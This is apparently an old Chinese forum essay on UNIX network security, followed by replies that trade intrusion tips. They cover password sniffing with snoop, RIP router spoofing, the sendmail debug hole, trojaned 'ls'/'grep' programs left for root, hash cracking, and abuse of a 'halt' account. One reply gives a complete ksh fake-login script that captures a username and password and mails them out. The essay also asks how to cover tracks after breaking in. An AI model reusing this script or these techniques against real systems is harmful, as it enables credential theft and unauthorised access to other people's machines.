UNIX系統安全(二)

　　當你為用戶精心設計了一系列安全措施後，用戶總會覺著有點“玄”。他憑什麼為這樣的網絡就是“安全”的呢？是根據設計方案的厚度？還是他為此所花的錢數？到底如何評價一個網絡的安全性呢？曾聽說過這樣的定義：“網絡的安全程度定義為該網絡被攻擊成功的可能性”，聽起來倒是蠻有哲理味兒的，可如何實際操作呢？計算機系統的安全程度可以用“橘皮書”的定義來評價，網絡系統是不是也可以搞出個“橘皮書”什麼的呢？　　　　當你左一層右一層地對信息加密時，心裡也許認為層數越多就越安全。但事實是不是真的這樣呢？當你又加了一層密時，到底增加了多少的安全性呢？　　　　“喏，你看....”，你指著自己的設計對用戶說“即使有人突破了第一道防線，我們還有第二道防線呢。即使第二道也被突破，我們仍然有第三道、第四....”。可憐的用戶望著得意洋洋的你，心裡不禁嘀咕：“干嘛搞這麼復雜....真的非這樣不可嗎？我可是只是想保證兩個星期的安全性啊。”　　　　為了防止大灰狼進來，小豬們把門窗都橫七豎八地釘了個死死的。可是大灰狼會不會從別處進來呢？比如說....壁爐的煙囪！聰明的小豬們在壁爐裡燒起了一鍋開水....。小豬們是聰明的，我們的系統管理員們呢？　　　　計算機系統的安全性依靠一種“訪問控制模型”來進行。有沒有可能建立一個“網絡安全模型”並對它進行形式化的證明，以便從理論上深入開展網絡安全的研究？這樣就可以擺脫目前的被動地“打補丁”的做法。　　　　網絡入侵和網絡安全是一對矛盾，沒有Hacker高手就不會有好的安全系統。這聽起來有些悲哀，可惜是事實。為了提高我們的安全防范能力，我看是不是先培養一批Hacker出來（中國的Hacker太少了）。在此提供幾條線索供Hacker們參考：　　　　用過Solaris的snoop命令嗎？　用它可以“聽到”同一共享網段內的其他用戶的口令（當然包括超級用戶的）。　　　　sendmail　5.5.9版本以前有個debug命令，　是個強有力的遠程調試工具，可惜也是一個大bug。　　　　冒充路由器可以看到所有往來的信息，RIP協議沒有身份認證的部分，雖然OSPF協議中有關於身份認證的部分，但很少有人用到。　　　　NFS、NIS都是不太安全的。　　　　1988年的WORM網絡病毒最厲害的地方並不是傳說中的利用　sendmail的缺陷，而是對看來毫無破綻的finger的攻擊！　　　　很多系統管理員為了關機方便而設立了halt之類的特殊用戶，　怎樣利用這一點來攻擊呢？　　　　侵入了一個系統之後，如何“打掃戰場”讓管理員看不出來？　如何潛伏下來以致於管理員除了重新安裝系統，別無清除的辦法呢？　　....　　這些東西都不是我憑空想象的，國外的Hacker們就是這麼做的（他們還有很多更厲害的招數呢）。很多東西我也不知道該怎麼做，Hacker們自己努力吧。　　1-----　　:　　　　　1).用過Solaris的snoop命令嗎？　用它可以“聽到”同一共享網段內的其他用戶:　　的口令（當然包括超級用戶的）。　　:　　　　　3).冒充路由器可以看到所有往來的信息，RIP協議沒有身份認證的部分，雖然:　　OSPF協議中有關於身份認證的部分，但很少有人用到。　　　　這兩個是取得口令的最簡潔之法,　呵呵.　-------　　　　　　　　　我也有一簡潔之法:　　　　把下面的shell　命令用　ksh　運行　　　　clear　　stty　ignbrk　　echo　"login:\c"　　read　logname　　stty　-echo　　echo　"passWord:\c"　　read　passwd　　print　"\nLogin　incorrect\n"　　print　$logname　$passwd　　mail　[email protected]　　stty　0　　stty　echo　　exit　　-----　　嗯，是一種方法，但必須你能訪問對方的機器才能偷到口令。常用的方法還有在自己能用的目錄裡放上叫"ls"　"grep"之類的程序,希望root能不小心運行到她們,　一旦獲得　root　權限,　呵呵,　下面的我就不用說了.　所以　root　的PATH裡不應當有　.　(當前目錄).　　　　更徹底的方法就是根據passwd文件裡面的密文算口令的明文,　我曾經編過一個算passwd的程序,　能在　Pentium　100機器上用半個小時左右的時間算出長度<=5　&&　只包含字母和數字　的口令.　因此選口令的時候要注意.　用jack14既可，攻擊得當的話6位不含大寫字母的pass也能在一月內破掉。　　　　這一方法要求必須取得對方含有密文的passwd文件(有shadow　passwd的機器上需要取得/etc/shadow),　所以要注意機器上passwd的安全性　(不要試圖取消用戶對該文件的讀權限,　所有的用戶都需要能讀該文件).　　-----　　解決的辦法，　可以用firewall屏蔽網段。　　也可以使用SSL(secure　socket　layber)替代原有的socket明文數據傳輸。　　-----　　:　　　　　　若干機器上都是用戶可以直接su　halt,　然後就成為超級用戶了,　　:　　　　　　有的機器你可以用rlogin　hostname　-l　halt　對方的機器就被shutdown了,:　　　　我用su　halt　然後就shutdown了.　有n個文件沒有存盤.